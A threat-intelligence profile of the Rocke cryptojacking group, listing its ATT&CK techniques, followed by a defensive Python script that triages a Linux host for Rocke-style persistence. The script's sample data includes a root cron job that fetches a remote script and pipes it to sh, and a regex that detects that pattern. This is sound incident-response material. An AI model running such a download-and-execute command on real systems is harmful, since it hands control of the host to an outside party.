Rocke
Aliases: None listed
Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed.
ATT&CK techniques
T1190: Exploit Public-Facing Application
T1014: Rootkit
T1027: Obfuscated Files or Information
T1102: Web Service
T1562.004: Disable or Modify System Firewall
T1059.004: Unix Shell
T1082: System Information Discovery
T1071: Application Layer Protocol
T1105: Ingress Tool Transfer
T1496.001: Compute Hijacking
T1027.004: Compile After Delivery
T1574.006: Dynamic Linker Hijacking
T1564.001: Hidden Files and Directories
T1053.003: Cron
T1059.006: Python
T1046: Network Service Discovery
T1055.002: Portable Executable Injection
T1102.001: Dead Drop Resolver
T1037: Boot or Logon Initialization Scripts
T1027.002: Software Packing
T1070.002: Clear Linux or Mac System Logs
T1547.001: Registry Run Keys / Startup Folder
T1222.002: Linux and Mac File and Directory Permissions Modification
T1057: Process Discovery
T1543.002: Systemd Service
T1018: Remote System Discovery
T1140: Deobfuscate/Decode Files or Information
T1562.001: Disable or Modify Tools
T1552.004: Private Keys
T1070.004: File Deletion
T1071.001: Web Protocols
T1571: Non-Standard Port
T1021.004: SSH
T1070.006: Timestomp
T1036.005: Match Legitimate Name or Location
T1518.001: Security Software Discovery
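Several of the Linux persistence and evasion techniques in the list above (T1574.006 Dynamic Linker Hijacking, T1053.003 Cron, T1564.001 Hidden Files and Directories, T1543.002 Systemd Service, T1036.005 Match Legitimate Name or Location) leave artifacts a responder can check quickly on a suspected cryptojacked host. The script below is an added example and is not Rocke's tooling or code from this page. The host snapshot it runs on is constructed; the file paths, the kernel-thread-name heuristic and the allowlist of standard hidden directories in /tmp are assumptions based on how these techniques are commonly implemented on Linux, not on published Rocke indicators.

```python
"""Linux host triage checks keyed to ATT&CK techniques in the Rocke profile.

Added example, not Rocke's tooling or the profile's own code. SAMPLE_HOST is a
constructed snapshot; the paths and heuristics are assumptions, not indicators
taken from any Rocke report.
"""
import os
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, str, str]  # (ATT&CK id, source path, evidence)

# Constructed snapshot: file path -> content. "/tmp/listing" is a pseudo-path
# holding the directory listing of /tmp, one entry per line.
SAMPLE_HOST: Dict[str, str] = {
    "/etc/ld.so.preload": "/usr/local/lib/libhide.so\n",
    "/etc/crontab": (
        "SHELL=/bin/sh\n"
        "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
        "*/10 * * * * root curl -fsSL http://198.51.100.7/x.sh | sh\n"
    ),
    "/tmp/listing": ".X11-unix\n.ICE-unix\n.kthreadd\n.tmp_dl/\n",
    "/etc/systemd/system/kworkerds.service": (
        "[Service]\nExecStart=/usr/sbin/kworkerds\n"
        "[Install]\nWantedBy=multi-user.target\n"
    ),
}

# Hidden directories X11/ICE create legitimately in /tmp (assumed allowlist).
KNOWN_HIDDEN = {".X11-unix", ".ICE-unix", ".font-unix", ".XIM-unix"}
# Heuristic: names borrowed from kernel threads, which never own a binary or unit file.
KERNEL_THREAD_NAMES = re.compile(r"^\.?(kworker|kthreadd|ksoftirqd|kswapd|migration)")
# Download-and-execute pattern in a cron command.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def check_ld_preload(host: Dict[str, str]) -> List[Finding]:
    """T1574.006: /etc/ld.so.preload is absent or empty on a default install,
    so any library listed there is worth a look."""
    out: List[Finding] = []
    for line in host.get("/etc/ld.so.preload", "").splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            out.append(("T1574.006", "/etc/ld.so.preload", line))
    return out


def check_cron(host: Dict[str, str]) -> List[Finding]:
    """T1053.003 (with T1105): cron jobs that fetch a script and pipe it to a shell."""
    out: List[Finding] = []
    for path, text in host.items():
        if not (path.startswith("/etc/cron") or path.startswith("/var/spool/cron")):
            continue
        for line in text.splitlines():
            if not line.startswith("#") and DOWNLOAD_EXEC.search(line):
                out.append(("T1053.003", path, line.strip()))
    return out


def check_hidden_tmp(host: Dict[str, str]) -> List[Finding]:
    """T1564.001: dot-prefixed entries in /tmp outside the known set."""
    out: List[Finding] = []
    for name in host.get("/tmp/listing", "").splitlines():
        base = name.rstrip("/")
        if base.startswith(".") and base not in KNOWN_HIDDEN:
            out.append(("T1564.001", "/tmp/" + base, name))
    return out


def check_masquerade(host: Dict[str, str]) -> List[Finding]:
    """T1543.002 / T1036.005: systemd units or /tmp entries named like kernel threads."""
    out: List[Finding] = []
    for path, text in host.items():
        if path.startswith("/etc/systemd/system/") and path.endswith(".service"):
            unit = os.path.basename(path)[: -len(".service")]
            m = re.search(r"^ExecStart=(.+)$", text, re.M)
            exe = m.group(1).strip() if m else ""
            if KERNEL_THREAD_NAMES.match(unit) or KERNEL_THREAD_NAMES.match(os.path.basename(exe)):
                out.append(("T1543.002", path, exe))
    for name in host.get("/tmp/listing", "").splitlines():
        base = name.rstrip("/")
        if KERNEL_THREAD_NAMES.match(base):
            out.append(("T1036.005", "/tmp/" + base, name))
    return out


def triage(host: Dict[str, str]) -> List[Finding]:
    """Run every check and return all findings in check order."""
    findings: List[Finding] = []
    for check in (check_ld_preload, check_cron, check_hidden_tmp, check_masquerade):
        findings.extend(check(host))
    return findings


def collect_live_host() -> Dict[str, str]:
    """Best-effort collector that builds the same snapshot from the running system."""
    host: Dict[str, str] = {}
    paths = ["/etc/ld.so.preload", "/etc/crontab"]
    for d in ("/etc/cron.d", "/etc/systemd/system"):
        try:
            paths += [os.path.join(d, n) for n in os.listdir(d)]
        except OSError:
            pass
    for p in paths:
        try:
            with open(p, encoding="utf-8", errors="replace") as f:
                host[p] = f.read()
        except OSError:
            pass
    try:
        host["/tmp/listing"] = "\n".join(os.listdir("/tmp"))
    except OSError:
        pass
    return host


if __name__ == "__main__":
    for tid, src, evidence in triage(SAMPLE_HOST):
        print(f"{tid}\t{src}\t{evidence}")
```

Against the constructed snapshot the script reports six findings across five technique IDs: the preloaded library, the curl-to-sh cron job, two unexpected hidden entries in /tmp, the kworker-named unit and the kernel-thread-named dotfile. Replace SAMPLE_HOST with collect_live_host() to run it on a real machine; expect to tune KNOWN_HIDDEN for whatever else legitimately lives in /tmp on that build.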